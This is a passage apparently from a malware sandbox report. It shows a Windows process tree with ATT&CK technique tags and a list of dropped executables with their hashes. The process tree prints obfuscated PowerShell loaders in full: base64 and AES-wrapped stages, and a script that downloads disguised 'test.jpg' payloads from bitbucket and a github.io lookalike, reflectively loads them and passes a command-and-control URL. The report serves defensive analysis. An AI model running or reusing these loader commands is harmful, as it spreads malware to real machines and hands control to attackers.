Onhnd0NCQzsJeGd3JGFlc194Z3d2YXIuUHhnd2FkZGlueGd3Zz1bU3l4Z3dzdGVtLnhnd1NlY3VyeGd3aXR5LkN4Z3dyeXB0b3hnd2dyYXBoeGd3eS5QYWR4Z3dkaW5nTXhnd29kZV06eGd3OlBLQ1N4Z3c3OwkkYXhnd2VzX3ZheGd3ci5LZXl4Z3c9W1N5c3hnd3RlbS5DeGd3b252ZXJ4Z3d0XTo6Rnhnd3JvbUJheGd3c2U2NFN4Z3d0cmluZ3hndygnVUNEeGd3ZFZ6U3Z4Z3dDMUNvOXhnd1VWb1B1eGd3RXRvVWR4Z3duNzZsQ3hndytPV0tJeGd3OG5qRGV4Z3dxTDZ4MHhndz0nKTsJeGd3JGFlc194Z3d2YXIuSXhnd1Y9W1N5eGd3c3RlbS54Z3dDb252ZXhnd3J0XTo6eGd3RnJvbUJ4Z3dhc2U2NHhnd1N0cmlueGd3ZygnK2F4Z3cvRHp3NHhnd1ZRR1g3eGd3L1J0Y0h4Z3dQQkpWd3hndz09Jyk7eGd3CSRkZWN4Z3dyeXB0b3hnd3JfdmFyeGd3PSRhZXN4Z3dfdmFyLnhnd0NyZWF0eGd3ZURlY3J4Z3d5cHRvcnhndygpOwkkeGd3cmV0dXJ4Z3duX3Zhcnhndz0kZGVjeGd3cnlwdG94Z3dyX3Zhcnhndy5UcmFueGd3c2Zvcm14Z3dGaW5hbHhnd0Jsb2NreGd3KCRwYXJ4Z3dhbV92YXhnd3IsIDAseGd3ICRwYXJ4Z3dhbV92YXhnd3IuTGVueGd3Z3RoKTt4Z3cJJGRlY3hnd3J5cHRveGd3cl92YXJ4Z3cuRGlzcHhnd29zZSgpeGd3OwkkYWV4Z3dzX3Zhcnhndy5EaXNweGd3b3NlKCl4Z3c7CSRyZXhnd3R1cm5feGd3dmFyO314Z3dmdW5jdHhnd2lvbiBzeGd3dGF4cCh4Z3ckcGFyYXhnd21fdmFyeGd3KXsJJGh4Z3dwaGM9Tnhnd2V3LU9ieGd3amVjdCB4Z3dTeXN0ZXhnd20uSU8ueGd3TWVtb3J4Z3d5U3RyZXhnd2FtKCwkeGd3cGFyYW14Z3dfdmFyKXhndzsJJGlzeGd3d2hiPU54Z3dldy1PYnhnd2plY3QgeGd3U3lzdGV4Z3dtLklPLnhnd01lbW9yeGd3eVN0cmV4Z3dhbTsJJHhnd2Zsc2l6eGd3PU5ldy14Z3dPYmplY3hnd3QgU3lzeGd3dGVtLkl4Z3dPLkNvbXhnd3ByZXNzeGd3aW9uLkd4Z3daaXBTdHhnd3JlYW0oeGd3JGhwaGN4Z3csIFtJT3hndy5Db21weGd3cmVzc2l4Z3dvbi5Db3hnd21wcmVzeGd3c2lvbk14Z3dvZGVdOnhndzpEZWNveGd3bXByZXN4Z3dzKTsJJHhnd2Zsc2l6eGd3LkNvcHl4Z3dUbygkaXhnd3N3aGIpeGd3OwkkZmx4Z3dzaXouRHhnd2lzcG9zeGd3ZSgpOwl4Z3ckaHBoY3hndy5EaXNweGd3b3NlKCl4Z3c7CSRpc3hnd3doYi5EeGd3aXNwb3N4Z3dlKCk7CXhndyRpc3doeGd3Yi5Ub0F4Z3dycmF5KHhndyk7fWZ1eGd3bmN0aW94Z3duIGhlenhnd2d4KCRweGd3YXJhbV94Z3d2YXIsJHhnd3BhcmFteGd3Ml92YXJ4Z3cpewkkbnhnd3g9W1N5eGd3c3RlbS54Z3dSZWZsZXhnd2N0aW9ueGd3LkFzc2V4Z3dtYmx5XXhndzo6KCdkeGd3YW9MJ1t4Z3ctMS4uLXhndzRdIC1qeGd3b2luICd4Z3cnKShbYnhnd3l0ZVtdeGd3XSRwYXJ4Z3dhbV92YXhnd3IpOwkkeGd3bGF6PSR4Z3dueC5Fbnhnd3RyeVBveGd3aW50Owl4Z3ckbGF6Lnhnd0ludm9reGd3ZSgkbnV4Z3dsbCwgJHhnd3BhcmFteGd3Ml92YXJ4Z3cpO30kaHhnd29zdC5VeGd3SS5SYXd4Z3dVSS5XaXhnd25kb3dUeGd3aXRsZSB4Z3c9ICR0aXhnd3M7JGxveGd3Zj1bU3l4Z3dzdGVtLnhnd0lPLkZpeGd3bGVdOjp4Z3coJ3R4ZXhnd1RsbEFkeGd3YWVSJ1t4Z3ctMS4uLXhndzExXSAteGd3am9pbiB4Z3cnJykoJHhnd3RpcykueGd3U3BsaXR4Z3coW0Vudnhnd2lyb25teGd3ZW50XTp4Z3c6TmV3THhnd2luZSk7eGd3Zm9yZWF4Z3djaCAoJHhnd3pwamxweGd3IGluICR4Z3dsb2YpIHhnd3sJaWYgeGd3KCR6cGp4Z3dscC5TdHhnd2FydHNXeGd3aXRoKCd4Z3c6OiAnKXhndykJewkJeGd3JGdxYnN4Z3c9JHpwanhnd2xwLlN1eGd3YnN0cml4Z3duZygzKXhndzsJCWJyeGd3ZWFrOwl4Z3d9fSRpdXhnd3A9W3N0eGd3cmluZ1t4Z3ddXSRncXhnd2JzLlNweGd3bGl0KCd4Z3dcJyk7JHhnd25sdD1zeGd3dGF4cCB4Z3cocHNvZ3hnd2wgKFtDeGd3b252ZXJ4Z3d0XTo6Rnhnd3JvbUJheGd3c2U2NFN4Z3d0cmluZ3hndygkaXVweGd3WzBdKSl4Z3cpOyRqZXhnd2J0PXN0eGd3YXhwICh4Z3dwc29nbHhndyAoW0NveGd3bnZlcnR4Z3ddOjpGcnhnd29tQmFzeGd3ZTY0U3R4Z3dyaW5nKHhndyRpdXBbeGd3MV0pKSl4Z3c7aGV6Z3hnd3ggJG5seGd3dCAkbnV4Z3dsbDtoZXhnd3pneCAkeGd3amVidCB4Z3coLFtzdHhnd3JpbmdbeGd3XV0gKCd4Z3clKicpKXhndzsNCidADQoNCiRybGpmcnAgPSAkdm1lYXJwIC1yZXBsYWNlICd4Z3cnLCAnJw0KDQpJbnZva2UtRXhwcmVzc2lvbiAkcmxqZnJwDQo=')) | Invoke-Expression"
                                8⤵
                                • Command and Scripting Interpreter: PowerShell
                                • System Location Discovery: System Language Discovery
                                • Suspicious behavior: EnumeratesProcesses
                                • Suspicious use of AdjustPrivilegeToken
                                PID:3204
                          • C:\Users\Admin\AppData\Local\Temp\10382020101\kO2IdCz.exe
                            "C:\Users\Admin\AppData\Local\Temp\10382020101\kO2IdCz.exe"
                            6⤵
                            • Executes dropped EXE
                            • Adds Run key to start application
                            PID:2268
                            • C:\Windows\system32\cmd.exe
                              cmd.exe /c 67e8f4de3ad1d.vbs
                              7⤵
                                PID:3488
                                • C:\Windows\System32\WScript.exe
                                  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\67e8f4de3ad1d.vbs"
                                  8⤵
                                    PID:3356
                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$dosigo = 'WwBO@GU@d@@u@FM@ZQBy@HY@aQBj@GU@U@Bv@Gk@bgB0@E0@YQBu@GE@ZwBl@HI@XQ@6@Do@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@@g@D0@I@Bb@E4@ZQB0@C4@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@BU@Hk@c@Bl@F0@Og@6@FQ@b@Bz@DE@Mg@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgB1@G4@YwB0@Gk@bwBu@C@@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@RgBy@G8@bQBM@Gk@bgBr@HM@I@B7@C@@c@Bh@HI@YQBt@C@@K@Bb@HM@d@By@Gk@bgBn@Fs@XQBd@CQ@b@Bp@G4@awBz@Ck@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@B3@GU@YgBD@Gw@aQBl@G4@d@@g@D0@I@BO@GU@dw@t@E8@YgBq@GU@YwB0@C@@UwB5@HM@d@Bl@G0@LgBO@GU@d@@u@Fc@ZQBi@EM@b@Bp@GU@bgB0@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bz@Gg@dQBm@GY@b@Bl@GQ@T@Bp@G4@awBz@C@@PQ@g@Ec@ZQB0@C0@UgBh@G4@Z@Bv@G0@I@@t@Ek@bgBw@HU@d@BP@GI@agBl@GM@d@@g@CQ@b@Bp@G4@awBz@C@@LQBD@G8@dQBu@HQ@I@@k@Gw@aQBu@Gs@cw@u@Ew@ZQBu@Gc@d@Bo@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgBv@HI@ZQBh@GM@a@@g@Cg@J@Bs@Gk@bgBr@C@@aQBu@C@@J@Bz@Gg@dQBm@GY@b@Bl@GQ@T@Bp@G4@awBz@Ck@I@B7@C@@d@By@Hk@I@B7@C@@cgBl@HQ@dQBy@G4@I@@k@Hc@ZQBi@EM@b@Bp@GU@bgB0@C4@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@K@@k@Gw@aQBu@Gs@KQ@g@H0@I@Bj@GE@d@Bj@Gg@I@B7@C@@YwBv@G4@d@Bp@G4@dQBl@C@@fQ@g@H0@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@By@GU@d@B1@HI@bg@g@CQ@bgB1@Gw@b@@g@H0@Ow@g@@0@Cg@k@EI@eQB0@GU@cw@g@D0@I@@n@Gg@d@B0@Cc@Ow@N@@o@J@BC@Hk@d@Bl@HM@Mg@g@D0@I@@n@H@@cw@6@C8@Lw@n@Ds@DQ@K@CQ@b@Bm@HM@Z@Bm@HM@Z@Bn@C@@PQ@g@C@@J@BC@Hk@d@Bl@HM@I@@r@CQ@QgB5@HQ@ZQBz@DI@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bs@Gk@bgBr@HM@I@@9@C@@Q@@o@Cg@J@Bs@GY@cwBk@GY@cwBk@Gc@I@@r@C@@JwBi@Gk@d@Bi@HU@YwBr@GU@d@@u@G8@cgBn@C8@ZwBm@Gg@Z@Bq@Gs@Z@Bk@C8@agBo@Gg@a@Bo@Gg@a@Bo@C8@Z@Bv@Hc@bgBs@G8@YQBk@HM@LwB0@GU@cwB0@DI@LgBq@H@@Zw@/@DE@Mw@3@DE@MQ@z@Cc@KQ@s@C@@K@@k@Gw@ZgBz@GQ@ZgBz@GQ@Zw@g@Cs@I@@n@G8@ZgBp@GM@ZQ@z@DY@NQ@u@Gc@aQB0@Gg@dQBi@C4@aQBv@C8@MQ@v@HQ@ZQBz@HQ@LgBq@H@@Zw@n@Ck@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@aQBt@GE@ZwBl@EI@eQB0@GU@cw@g@D0@I@BE@G8@dwBu@Gw@bwBh@GQ@R@Bh@HQ@YQBG@HI@bwBt@Ew@aQBu@Gs@cw@g@CQ@b@Bp@G4@awBz@Ds@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@aQBm@C@@K@@k@Gk@bQBh@Gc@ZQBC@Hk@d@Bl@HM@I@@t@G4@ZQ@g@CQ@bgB1@Gw@b@@p@C@@ew@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@I@@9@C@@WwBT@Hk@cwB0@GU@bQ@u@FQ@ZQB4@HQ@LgBF@G4@YwBv@GQ@aQBu@Gc@XQ@6@Do@VQBU@EY@O@@u@Ec@ZQB0@FM@d@By@Gk@bgBn@Cg@J@Bp@G0@YQBn@GU@QgB5@HQ@ZQBz@Ck@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@HM@d@Bh@HI@d@BG@Gw@YQBn@C@@PQ@g@Cc@P@@8@EI@QQBT@EU@Ng@0@F8@UwBU@EE@UgBU@D4@Pg@n@Ds@I@@k@GU@bgBk@EY@b@Bh@Gc@I@@9@C@@Jw@8@Dw@QgBB@FM@RQ@2@DQ@XwBF@E4@R@@+@D4@Jw@7@C@@J@Bz@HQ@YQBy@HQ@SQBu@GQ@ZQB4@C@@PQ@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@LgBJ@G4@Z@Bl@Hg@TwBm@Cg@J@Bz@HQ@YQBy@HQ@RgBs@GE@Zw@p@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bl@G4@Z@BJ@G4@Z@Bl@Hg@I@@9@C@@J@Bp@G0@YQBn@GU@V@Bl@Hg@d@@u@Ek@bgBk@GU@e@BP@GY@K@@k@GU@bgBk@EY@b@Bh@Gc@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@Gk@Zg@g@Cg@J@Bz@HQ@YQBy@HQ@SQBu@GQ@ZQB4@C@@LQBn@GU@I@@w@C@@LQBh@G4@Z@@g@CQ@ZQBu@GQ@SQBu@GQ@ZQB4@C@@LQBn@HQ@I@@k@HM@d@Bh@HI@d@BJ@G4@Z@Bl@Hg@KQ@g@Hs@I@@k@HM@d@Bh@HI@d@BJ@G4@Z@Bl@Hg@I@@r@D0@I@@k@HM@d@Bh@HI@d@BG@Gw@YQBn@C4@T@Bl@G4@ZwB0@Gg@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@GI@YQBz@GU@Ng@0@Ew@ZQBu@Gc@d@Bo@Gg@I@@9@C@@J@Bl@G4@Z@BJ@G4@Z@Bl@Hg@I@@t@C@@J@Bz@HQ@YQBy@HQ@SQBu@GQ@ZQB4@Ds@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bi@GE@cwBl@DY@N@BD@G8@bQBt@GE@bgBk@C@@PQ@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@LgBT@HU@YgBz@HQ@cgBp@G4@Zw@o@CQ@cwB0@GE@cgB0@Ek@bgBk@GU@e@@s@C@@J@Bi@GE@cwBl@DY@N@BM@GU@bgBn@HQ@a@Bo@Ck@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@ZQBu@GQ@SQBu@GQ@ZQB4@C@@PQ@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@LgBJ@G4@Z@Bl@Hg@TwBm@Cg@J@Bl@G4@Z@BG@Gw@YQBn@Ck@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@GM@bwBt@G0@YQBu@GQ@QgB5@HQ@ZQBz@C@@PQ@g@Fs@UwB5@HM@d@Bl@G0@LgBD@G8@bgB2@GU@cgB0@F0@Og@6@EY@cgBv@G0@QgBh@HM@ZQ@2@DQ@UwB0@HI@aQBu@Gc@K@@k@GI@YQBz@GU@Ng@0@EM@bwBt@G0@YQBu@GQ@KQ@7@C@@I@@g@CQ@ZQBu@GQ@SQBu@GQ@ZQB4@C@@PQ@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@LgBJ@G4@Z@Bl@Hg@TwBm@Cg@J@Bl@G4@Z@BG@Gw@YQBn@Ck@Ow@g@C@@I@@k@GU@bgBk@Ek@bgBk@GU@e@@g@D0@I@@k@Gk@bQBh@Gc@ZQBU@GU@e@B0@C4@SQBu@GQ@ZQB4@E8@Zg@o@CQ@ZQBu@GQ@RgBs@GE@Zw@p@Ds@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@b@Bv@GE@Z@Bl@GQ@QQBz@HM@ZQBt@GI@b@B5@C@@PQ@g@Fs@UwB5@HM@d@Bl@G0@LgBS@GU@ZgBs@GU@YwB0@Gk@bwBu@C4@QQBz@HM@ZQBt@GI@b@B5@F0@Og@6@Ew@bwBh@GQ@K@@k@GM@bwBt@G0@YQBu@GQ@QgB5@HQ@ZQBz@Ck@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bj@G8@bQBw@HI@ZQBz@HM@ZQBk@EI@eQB0@GU@QQBy@HI@YQB5@C@@PQ@g@Ec@ZQB0@C0@QwBv@G0@c@By@GU@cwBz@GU@Z@BC@Hk@d@Bl@EE@cgBy@GE@eQ@g@C0@YgB5@HQ@ZQBB@HI@cgBh@Hk@I@@k@GU@bgBj@FQ@ZQB4@HQ@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@d@B5@H@@ZQ@g@D0@I@@k@Gw@bwBh@GQ@ZQBk@EE@cwBz@GU@bQBi@Gw@eQ@u@Ec@ZQB0@FQ@eQBw@GU@K@@n@HQ@ZQBz@HQ@c@Bv@Hc@ZQBy@HM@a@Bl@Gw@b@@u@Eg@bwBh@GE@YQBh@GE@YQBz@GQ@bQBl@Cc@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bl@G4@Z@BJ@G4@Z@Bl@Hg@I@@9@C@@J@Bp@G0@YQBn@GU@V@Bl@Hg@d@@u@Ek@bgBk@GU@e@BP@GY@K@@k@GU@bgBk@EY@b@Bh@Gc@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@G0@ZQB0@Gg@bwBk@C@@PQ@g@CQ@d@B5@H@@ZQ@u@Ec@ZQB0@E0@ZQB0@Gg@bwBk@Cg@JwBs@GY@cwBn@GU@Z@Bk@GQ@Z@Bk@GQ@Z@Bh@Cc@KQ@u@Ek@bgB2@G8@awBl@Cg@J@Bu@HU@b@Bs@Cw@I@Bb@G8@YgBq@GU@YwB0@Fs@XQBd@C@@K@@n@C@@d@B4@HQ@LgBi@G8@YQBl@GU@c@Bk@C8@cwBl@Gw@aQBm@F8@YwBp@Gw@YgB1@H@@Lw@y@DE@MQ@u@DY@Mg@y@C4@M@@2@C4@Mg@2@C8@Lw@6@Cc@L@@g@Cc@M@@n@Cw@I@@n@FM@d@Bh@HI@d@B1@H@@TgBh@G0@ZQ@n@Cw@I@@n@FI@ZQBn@EE@cwBt@Cc@L@@g@Cc@M@@n@Ck@KQB9@H0@';$oWjuxd = [system.Text.encoding]::Unicode.GetString([system.convert]::Frombase64string( $dosigo.replace('@','A') ));powershell.exe $OWjuxD .exe -windowstyle hidden -exec
                                      9⤵
                                      • Command and Scripting Interpreter: PowerShell
                                      PID:3620
                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $Bytes = 'htt'; $Bytes2 = 'ps://'; $lfsdfsdg = $Bytes +$Bytes2; $links = @(($lfsdfsdg + 'bitbucket.org/gfhdjkdd/jhhhhhhh/downloads/test2.jpg?137113'), ($lfsdfsdg + 'ofice365.github.io/1/test.jpg')); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Lengthh = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Lengthh); $endIndex = $imageText.IndexOf($endFlag); $commandBytes = [System.Convert]::FromBase64String($base64Command); $endIndex = $imageText.IndexOf($endFlag); $endIndex = $imageText.IndexOf($endFlag); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $compressedByteArray = Get-CompressedByteArray -byteArray $encText $type = $loadedAssembly.GetType('testpowershell.Hoaaaaaasdme'); $endIndex = $imageText.IndexOf($endFlag); $method = $type.GetMethod('lfsgeddddddda').Invoke($null, [object[]] (' txt.boaeepd/selif_cilbup/211.622.06.26//:', '0', 'StartupName', 'RegAsm', '0'))}}" .exe -windowstyle hidden -exec
                                        10⤵
                                        • Command and Scripting Interpreter: PowerShell
                                        PID:3672
                              • C:\Users\Admin\AppData\Local\Temp\10382030101\14c1ae9607.exe
                                "C:\Users\Admin\AppData\Local\Temp\10382030101\14c1ae9607.exe"
                                6⤵
                                  PID:2016
                      • C:\Windows\explorer.exe
                        explorer.exe
                        1⤵
                        • Boot or Logon Autostart Execution: Active Setup
                        • Suspicious use of AdjustPrivilegeToken
                        PID:2992

                      Network

                      MITRE ATT&CK Enterprise v15

                      Replay Monitor

                      Loading Replay Monitor...

                      Downloads

                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\7BCOPU31\service[1].htm

                        Filesize

                        1B

                        MD5

                        cfcd208495d565ef66e7dff9f98764da

                        SHA1

                        b6589fc6ab0dc82cf12099d1c2d40ab994e8410c

                        SHA256

                        5feceb66ffc86f38d952786c6d696c79c2dbc239dd4e91b46729d73a27fb57e9

                        SHA512

                        31bca02094eb78126a517b206a88c73cfa9ec6f704c7030d18212cace820f025f00bf0ea68dbf3f3a5436ca63b53bf7bf80ad8d5de7d8359d0b7fed9dbc3ab99

                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\NT668XG4\soft[1]

                        Filesize

                        3.0MB

                        MD5

                        2cb4cdd698f1cbc9268d2c6bcd592077

                        SHA1

                        86e68f04bc99f21c9d6e32930c3709b371946165

                        SHA256

                        c89a0fea7c3850c8bf4b6a231a34cfb699c97783b1b2b1176070dd4d9cb4bd4a

                        SHA512

                        606216ce50d2c89f4700fd3f8853b09f5626615cac64bfe304c15524a908b4a220abed1a023b0f099d390a2e5b14e1dc4f94840aa398658188ad299c93939de3

                      • C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\bhzluvd5.default-release\activity-stream.discovery_stream.json.tmp

                        Filesize

                        25KB

                        MD5

                        a76277a6d16f54b823ae71a9d8872403

                        SHA1

                        b0f5b070b7c5b3fb868eef6a15abe5323d3badc1

                        SHA256

                        d60d6e977561051c5c2a8208aaee162dd119b3bcc548a0fca29bb19c00620e5e

                        SHA512

                        e3595e153c8806f16d65e6403db3029d973098c40cbcaeee43f522d7a586a51f3b9275e7412aa5e3b607edbe7aa5aa938f83eeafb89fa61c65a43e5729e86b4a

                      • C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\bhzluvd5.default-release\settings\main\ms-language-packs\browser\newtab\asrouter.ftl

                        Filesize

                        15KB

                        MD5

                        96c542dec016d9ec1ecc4dddfcbaac66

                        SHA1

                        6199f7648bb744efa58acf7b96fee85d938389e4

                        SHA256

                        7f32769d6bb4e875f58ceb9e2fbfdc9bd6b82397eca7a4c5230b0786e68f1798

                        SHA512

                        cda2f159c3565bc636e0523c893b293109de2717142871b1ec78f335c12bad96fc3f62bcf56a1a88abdeed2ac3f3e5e9a008b45e24d713e13c23103acc15e658

                      • C:\Users\Admin\AppData\Local\Temp\10381850101\98aa894168.exe

                        Filesize

                        2.9MB

                        MD5

                        aa05ed038e333f17ef7004862f8b0c86

                        SHA1

                        78733f2d4cb5cf0ad14eac5fa9bcb4c570ef7ef1

                        SHA256

                        8a011207a0aa485819ff978ad7678acec6bddf2457531b08ad069a48e70d143b

                        SHA512

                        bbc4de35b8fbc9868f9c2536090c6c2dc9ba1180d5bccaf838db2c2a60f98f18791ffd40beb40c9ca9998cb214c9d6cb0306d8afd7bca43ca4f4d114f4db7ce3

                      • C:\Users\Admin\AppData\Local\Temp\10381860101\19114c195b.exe

                        Filesize

                        1.7MB

                        MD5

                        0ffdfe75f11f8db0592eeec2c76cfad8

                        SHA1

                        ee7dcdaa0d4ffcbc369b7cca93e6c506ed59555c

                        SHA256

                        e87bbd322a31b45429d71bb431b860860ca09806f228471937d16fcae1133389

                        SHA512

                        eca5bdaaef3a1a72c6845476666251594891b719b5ab24bc2909c16fce6c9d164b256431277231bfe018a860abf0c57f07513ea037335650624408b468282230

                      • C:\Users\Admin\AppData\Local\Temp\10381870101\08962ffdb3.exe

                        Filesize

                        947KB

                        MD5

                        ceb9486a31fee239bad9951cf311e4f3

                        SHA1

                        5822f1746c8ce55859d39158b5d749c354ea0b17

                        SHA256

                        b198a1ad49c7b4a1b1fc43168819bd452a6019627e387430be31a33e8557bcf0

                        SHA512

                        3c37609b0db631524fece9ee69cbcaeb6aa7307dc146fe985ccfe00fc338830f6a7d34f2d7c7033fb066df34a370504197b5a03abefa025e42c4b93e8baffe45

                      • C:\Users\Admin\AppData\Local\Temp\10381880101\c9c7f0ab08.exe

                        Filesize

                        1.7MB

                        MD5

                        4b764819554a815766d6d911ef2756c0

                        SHA1

                        342390f34a9dd537f1991dbbe6069889c2838872

                        SHA256

                        86cc5c80691e69d6fdc3a42a38604466f86d265d0f736095b2065a78705a199d

                        SHA512

                        0fe38ed6d510d3ffab3ed62be5db649d36e6e3be2f7fb7931b4afd765c22b0290b00458e5d8d7bf2b9915afe268221ed61f327ac095fd0442c44a3b289fe13dd

                      • C:\Users\Admin\AppData\Local\Temp\10381890101\c24892eea3.exe

                        Filesize

                        1.8MB

                        MD5

                        242617c7d9c922457ad4ea64cb40f6ea

                        SHA1

                        9725d4a1e476d9fb9d3e0b495fa4796b250470ba

                        SHA256

                        f7fa8ca1c918f76a3b9057bde8cee2ce5bb6dda1b069cbfc531c513ab6b060c2

                        SHA512

                        f122a19107afd8d4914bf5997ad64c26468b0a1b2db8802a47345acd7e60d925a41cc4a2fa934a752b021ba7b8cefa886c16ca728da01ce21942d6e91675a6ab

                      • C:\Users\Admin\AppData\Local\Temp\10381900101\c927d0c717.exe

                        Filesize

                        480KB

                        MD5

                        1c601dcb633a5a1ad3d903a746cf7e2e

                        SHA1

                        6d10ea6cbedab7320c3e1f806d65c9b869105c11

                        SHA256

                        960670b325ad49c1bf269c9816f2c254fa5371f96b3ad7371c5150c49591a3c7

                        SHA512

                        4c692251958acc9ed91170cd327644886d965802778558f0dd7894943cbb3d8dfc990f1ffc2549782503f72a97718469e37dee495adc89e8fef02601e2325cf7

                      • C:\Users\Admin\AppData\Local\Temp\10381910101\ef27b08794.exe

                        Filesize

                        4.5MB

                        MD5

                        289e4ddcf0bf64afdb644fb575a8b1a5

                        SHA1

                        6213ebcbc71ccea7e065abd6c83ed51e90c28288

                        SHA256

                        7d254530f4e89834307333d738f71afe7a0dec12953f80a4fbfb4e03675910d5

                        SHA512

                        f4220a0288389ee49109dc569126eb827bba4204c53547e9e70dda23c27a7579bb8f2f43a1fba0e81305333679f1ce1d0eb794292c9a06157e7d19e0600d9784

                      • C:\Users\Admin\AppData\Local\Temp\10381920101\b38b07c84e.exe

                        Filesize

                        4.3MB

                        MD5

                        4ea661c85a082117e59ea78f2f140a1c

                        SHA1

                        49940f31bc96b08d70c1ef56d010ea320f9bbb74

                        SHA256

                        389d6b90d016366fbe93940d9e4cc9594a5491c408cdc803766397012aee1a3a

                        SHA512

                        df3444c2a93ca62572d0f5640ece177973a3f9750952cc9d415d3dc03a0c14f66d3ce3d35f3c0ff44480809be8bf9218ae50cbddeeb4486e8850213a9330a394

                      • C:\Users\Admin\AppData\Local\Temp\10381930101\97a6af6f7d.exe

                        Filesize

                        1.1MB

                        MD5

                        96fa728730da64d7d6049c305c40232c

                        SHA1

                        3fd03c4f32e3f9dbcc617507a7a842afb668c4de

                        SHA256

                        28d15f133c8ea7bf4c985207eefdc4c8c324ff2552df730f8861fcc041bc3e93

                        SHA512

                        c66458fcb654079c4d622aa30536f8fbdef64fe086b8ca5f55813f18cb0d511bc25b846deec80895b303151dfe232ca2f755b0ad54d3bafcf2aec7ff318dbcbe

                      • C:\Users\Admin\AppData\Local\Temp\10381940101\331f54e8f5.exe

                        Filesize

                        1.8MB

                        MD5

                        d127c329efff5000e6f0d89c1e9b466a

                        SHA1

                        cffdf46c13351b3026f6aa7d97b18ad5e7dce355

                        SHA256

                        50e6f94e802b6787eb81845d6d947c37093057db3724f9973e0dc456df76729d

                        SHA512

                        b1fb07a58adfb0200ad60ecf17eb6d8a76f236ced349277c109f898bd3c27b85c59a9f3eb9327e3cec9ef1ffd1bbd3280969b6655a1078101a55499aed54b0bf

                      • C:\Users\Admin\AppData\Local\Temp\10381950101\EPTwCQd.exe

                        Filesize

                        712KB

                        MD5

                        19cc136b64066f972db18ef9cc2da8ca

                        SHA1

                        b6c139090c0e3d13f4e67e4007cec0589820cf91

                        SHA256

                        d20816d1e73f63beaea4bee9afc4388d07b7235a3a332674e969b646cc454597

                        SHA512

                        a3e5f486289d49978ad4e76c83667ba065efe0d061de7c9b4a88b68a167a7ac0e09d850583e15f274862880dcb6f76c51586bbc4be53419d403a0c7a3ce14434

                      • C:\Users\Admin\AppData\Local\Temp\10381960101\787cf349f0.exe

                        Filesize

                        2.0MB

                        MD5

                        df1e0aedaacc267a438daecd28fa9fe3

                        SHA1

                        be62ff716221228544c9d52c2e8878d06ad3c46e

                        SHA256

                        9767b1c1f945f747be50373e0d60862bd252cbc7fa002be8e8a39cc0334a4ec5

                        SHA512

                        993f148c2e9914c7ac9fd3c83bee62a1363929550e98e9c71f77a60e482fce5511acb497ffa1a45b4704315baaed1beb04e1a92454f892779c004a2c60f0c9b8

                      • C:\Users\Admin\AppData\Local\Temp\10381970101\u75a1_003.exe

                        Filesize

                        1.3MB

                        MD5

                        9498aeaa922b982c0d373949a9fff03e

                        SHA1

                        98635c528c10a6f07dab7448de75abf885335524

                        SHA256

